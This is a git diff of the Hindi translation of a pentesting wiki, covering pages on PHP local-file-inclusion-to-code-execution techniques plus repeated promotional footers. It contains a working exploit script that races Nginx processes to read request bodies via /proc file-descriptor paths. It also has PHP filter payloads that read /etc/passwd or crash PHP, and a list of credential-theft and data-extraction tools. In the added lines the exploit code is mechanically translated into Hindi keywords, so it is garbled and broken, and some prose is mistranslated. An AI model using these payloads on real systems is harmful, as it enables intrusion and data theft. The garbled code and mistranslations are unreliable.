}
-if "hxp" in d:
-print("Found flag! ")
-print(d)
-
-def read_file_worker(requests_session, nginx_pid, nginx_pids):
-# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
-for fd in range(10, 45):
-thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
-thread.start()
-
-def read_file_multiprocess(requests_session, nginx_pids):
-for nginx_pid in nginx_pids:
-p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
-p.start()
-
-if __name__ == "__main__":
-print('[DEBUG] Creating requests session')
-requests_session = create_requests_session()
-print('[DEBUG] Getting Nginx pids')
-nginx_pids = get_nginx_pids(requests_session)
-print(f'[DEBUG] Nginx pids: {nginx_pids}')
-print('[DEBUG] Starting payload sending')
-send_payload_multiprocess(requests_session)
-print('[DEBUG] Starting fd readers')
-read_file_multiprocess(requests_session, nginx_pids)
```
-## प्रयोगशालाएं
+```html
+भेजें_पेलोड_कार्यकर्ता(अनुरोध_सत्र):
+
+जब तक: भेजें_पेलोड(अनुरोध_सत्र)
+
+भेजें_पेलोड_बहुप्रक्रिया(अनुरोध_सत्र):
+
+# सभी सीपीयू का उपयोग करें ताकि Nginx के लिए अनुरोध शरीर के रूप में पेलोड भेजा जा सके
+
+के लिए \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=भेजें_पेलोड_कार्यकर्ता, args=(अनुरोध_सत्र,)) p.start()
+
+यादृच्छिक_पथ_उपसर्ग_उत्पन्न_करें(nginx\_pids):
+
+# यह विधि यादृच्छिक संख्या के ProcFS पथ घटकों से एक पथ बनाती है। एक उत्पन्न पथ इस प्रकार दिखेगा /proc/\/cwd/proc/\/root/proc/\/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
+
+फ़ाइल_पढ़ें(अनुरोध_सत्र, nginx\_pid, fd, nginx\_pids):
+
+nginx\_pid\_सूची = list(nginx\_pids) while True: path = यादृच्छिक_पथ_उपसर्ग_उत्पन्न_करें(nginx\_pid\_सूची) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # ध्वज हेक्सपी{} के रूप में स्वरूपित होते हैं अगर "hxp" में d है: print("ध्वज पाया गया! ") print(d)
+
+फ़ाइल_पढ़ें_कार्यकर्ता(अनुरोध_सत्र, nginx\_pid, nginx\_pids):
+
+# एक लूप में 10 - 45 के बीच Nginx FDs स्कैन करें। क्योंकि फ़ाइलें और सॉकेट बंद होते रहते हैं - यह अनुरोध शरीर FD को इस सीमा के भीतर खोलना बहुत सामान्य है जिसके लिए fd in range(10, 45): thread = threading.Thread(target = फ़ाइल_पढ़ें, args = (अनुरोध_सत्र, nginx\_pid, fd, nginx\_pids)) thread.start()
+
+फ़ाइल_पढ़ें_बहुप्रक्रिया(अनुरोध_सत्र, nginx\_pids):
+
+के लिए nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=फ़ाइल_पढ़ें_कार्यकर्ता, args=(अनुरोध_सत्र, nginx\_pid, nginx\_pids)) p.start()
+
+यदि **नाम** == "**मुख्य**": print('\[DEBUG] अनुरोध सत्र बनाना') requests\_session = create\_requests\_session() print('\[DEBUG] Nginx pids प्राप्त करना') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] पेलोड भेजना शुरू करना') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] fd पठक पढ़ना शुरू करना') read\_file\_multiprocess(requests\_session, nginx\_pids)
+```
+```
+
+## Labs
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
-## संदर्भ
+## References
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
+### [WhiteIntel](https://whiteintel.io)
+
+
+
+[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
+
+Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
+
+You can check their website and try their engine for **free** at:
+
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
+Support HackTricks
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
-* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
-* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
-* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
+```
+
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
index 81b5b0629..3524be406 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
@@ -1,20 +1,21 @@
# LFI2RCE के माध्यम से सेगमेंटेशन फॉल्ट
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
-* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
-* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके.
+{% endhint %}
-वाइटअप्स [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) के अनुसार, निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट का कारण बनाया:
+लेखन के अनुसार [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट का कारण बनाया:
```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");
@@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```
-आपको यह जानना चाहिए कि अगर आप **POST** अनुरोध **भेजते हैं** जिसमें एक **फ़ाइल** हो, तो PHP उस फ़ाइल की सामग्री के साथ **`/tmp/php`** में एक **अस्थायी फ़ाइल बनाएगा**। यह फ़ाइल **स्वचालित रूप से हटा दी जाएगी** एक बार अनुरोध प्रसंस्कृत हो जाए।
+आपको यह जानना चाहिए कि अगर आप एक **POST** अनुरोध **भेजते हैं** जिसमें एक **फ़ाइल** होती है, तो PHP उस फ़ाइल की सामग्री के साथ **`/tmp/php`** में एक **अस्थायी फ़ाइल बनाएगा**। यह फ़ाइल **स्वचालित रूप से हटा दी जाएगी** एक बार अनुरोध प्रोसेस हो जाने के बाद।
-अगर आपको **LFI** मिलता है और आप PHP में **सेगमेंटेशन फॉल्ट को ट्रिगर** करने में कामयाब होते हैं, तो **अस्थायी फ़ाइल कभी नहीं हटाई जाएगी**। इसलिए, आप इसे **LFI** भेद्यता के साथ खोज सकते हैं जब तक आप इसे नहीं मिलता और विचारात्मक कोड को क्रियान्वित कर सकते हैं।
+अगर आपको एक **LFI** मिल जाता है और आप PHP में **सेगमेंटेशन फॉल्ट** को **ट्रिगर** करने में कामयाब होते हैं, तो **अस्थायी फ़ाइल कभी नहीं हटाई जाएगी**। इसलिए, आप उसे **LFI** जोख सकते हैं तकि आप उसे खोज सकें और विचारात्मक कोड का निषेध कर सकें।
आप [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) का उपयोग परीक्षण के लिए कर सकते हैं।
```python
@@ -69,16 +70,17 @@ bruteforce(charset)
if __name__ == "__main__":
main()
```
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
+हैकट्रिक्स का समर्थन करें
-दूसरे तरीके HackTricks का समर्थन करने के लिए:
-
-* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
-* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
+* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम ग्रुप**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %}
diff --git a/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/pentesting-web/file-inclusion/via-php_session_upload_progress.md
index 75512e1cf..e094f8ba6 100644
--- a/pentesting-web/file-inclusion/via-php_session_upload_progress.md
+++ b/pentesting-web/file-inclusion/via-php_session_upload_progress.md
@@ -1,22 +1,23 @@
# LFI2RCE के माध्यम से PHP\_SESSION\_UPLOAD\_PROGRESS
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
-* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
-* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
-* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर** सबमिट करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %}
## मूल जानकारी
-अगर आपने **स्थानीय फ़ाइल समावेशन** पाया है भले ही आपके पास **कोई सत्र न हो** और `session.auto_start` `ऑफ` है। अगर **`session.upload_progress.enabled`** **`ऑन`** है और आप **मल्टीपार्ट POST** डेटा में **`PHP_SESSION_UPLOAD_PROGRESS`** प्रदान करते हैं, तो PHP **आपके लिए सत्र सक्षम कर देगा**।
+अगर आपने **स्थानीय फ़ाइल समावेशन** पाया है भले ही आपके पास **कोई सत्र न हो** और `session.auto_start` `ऑफ` है। अगर **`session.upload_progress.enabled`** **`ऑन`** है और आप **`PHP_SESSION_UPLOAD_PROGRESS`** को **मल्टीपार्ट POST** डेटा में प्रदान करते हैं, तो PHP **आपके लिए सत्र सक्षम कर देगा**।
```bash
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
@@ -30,19 +31,19 @@ $ ls -a /var/lib/php/sessions/
In the last example the session will contain the string blahblahblah
```
-सावधान रहें कि **`PHP_SESSION_UPLOAD_PROGRESS`** के साथ आप **सत्र के अंदर डेटा को नियंत्रित कर सकते हैं**, इसलिए अगर आप अपने सत्र फ़ाइल को शामिल करते हैं तो आप एक हिस्सा शामिल कर सकते हैं जिसे आप नियंत्रित करते हैं (उदाहरण के लिए एक PHP शैलकोड)।
+नोट करें कि **`PHP_SESSION_UPLOAD_PROGRESS`** के साथ आप **सत्र के अंदर डेटा को नियंत्रित कर सकते हैं**, इसलिए अगर आप अपने सत्र फ़ाइल को शामिल करते हैं तो आप एक हिस्सा शामिल कर सकते हैं जिसे आप नियंत्रित करते हैं (उदाहरण के लिए एक PHP शैलकोड)।
{% hint style="info" %}
-हालांकि इंटरनेट पर अधिकांश ट्यूटोरियल आपको डीबगिंग के उद्देश्य से `session.upload_progress.cleanup` को `Off` पर सेट करने की सिफारिश करते हैं। PHP में डिफ़ॉल्ट `session.upload_progress.cleanup` अब भी `On` है। इसका मतलब है कि आपका सत्र में अपलोड प्रगति को जल्द से जल्द साफ किया जाएगा। इसलिए यह **रेस कंडीशन** होगा।
+हालांकि इंटरनेट पर अधिकांश ट्यूटोरियल आपको डीबगिंग उद्देश्य के लिए `session.upload_progress.cleanup` को `Off` पर सेट करने की सिफारिश करते हैं। PHP में डिफ़ॉल्ट `session.upload_progress.cleanup` अब भी `On` है। इसका मतलब है कि आपका सत्र में अपलोड प्रगति को जल्द से जल्द साफ किया जाएगा। इसलिए यह **रेस कंडीशन** होगा।
{% endhint %}
-### CTF
+### सीटीएफ
-[**मूल CTF**](https://blog.orange.tw/2018/10/) में जहाँ इस तकनीक पर टिप्पणी की गई है, वहाँ रेस कंडीशन का शोषण करना पर्याप्त नहीं था बल्कि लोड किया गया सामग्री भी `@[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट)!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
-* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
-* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %}
**पोस्ट की जाँच करें [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
+{% hint style="success" %}
+AWS हैकिंग सीखें और प्रैक्टिस करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट)!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
-* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
-* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %}
diff --git a/post-exploitation.md b/post-exploitation.md
index 1ed0d1b4c..5265bd28a 100644
--- a/post-exploitation.md
+++ b/post-exploitation.md
@@ -1,41 +1,28 @@
-
-
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
-
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
-
-
-
-
-## **Local l00t**
-
-* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट्स, PE वेक्टर्स की खोज के अलावा, फाइलसिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगी।
-* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग एक स्थानीय कंप्यूटर पर संग्रहीत बहुत सारे पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अपने पासवर्ड्स को विभिन्न तकनीकों (plaintext, APIs, कस्टम एल्गोरिदम, डेटाबेस, आदि) का उपयोग करके संग्रहीत करता है। यह टूल सबसे अधिक प्रयुक्त सॉफ्टवेयर के लिए इन पासवर्ड्स को खोजने के उद्देश्य से विकसित किया गया है।
-
-## **External Services**
-
-* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के API से एक्सेस टोकन का उपयोग करके कनेक्ट होगा, PDF में निर्यात करेगा, और उन Confluence दस्तावेजों को डाउनलोड करेगा जिन तक लक्ष्य की पहुँच है।
-* [**GD-Thief**](https://github.com/antman1p/GD-Thief): यह एक Red Team टूल है जो आपके (हमलावर) द्वारा पहुँच योग्य लक्ष्य के Google Drive से फाइलों को निकालने के लिए Google Drive API का उपयोग करता है। इसमें सभी साझा की गई फाइलें, साझा ड्राइव्स से सभी फाइलें, और डोमेन ड्राइव्स से सभी फाइलें शामिल हैं जिन तक लक्ष्य की पहुँच है।
-* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): यह एक Red Team टूल है जो लक्ष्य संगठन की Google People Directory को निकालने के लिए Google के People API का उपयोग करता है जिस तक आपकी पहुँच है।
-* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक Python में विकसित टूल है जो एक Slack workspace से 'रोचक' जानकारी निकालने के लिए मूल Slack APIs का उपयोग करता है, बशर्ते एक्सेस टोकन दिया गया हो।
-* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो लाल और नीली टीमों को एक Slack workspace/संगठन की त्वरित रेकी करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फाइलों, संदेशों, आदि का संग्रह जल्दी से खोज योग्य बनाता है और बड़ी वस्तुओं को ऑफलाइन समीक्षा के लिए CSV में लिखा जाता है।
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
+* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें फॉलो करें**.
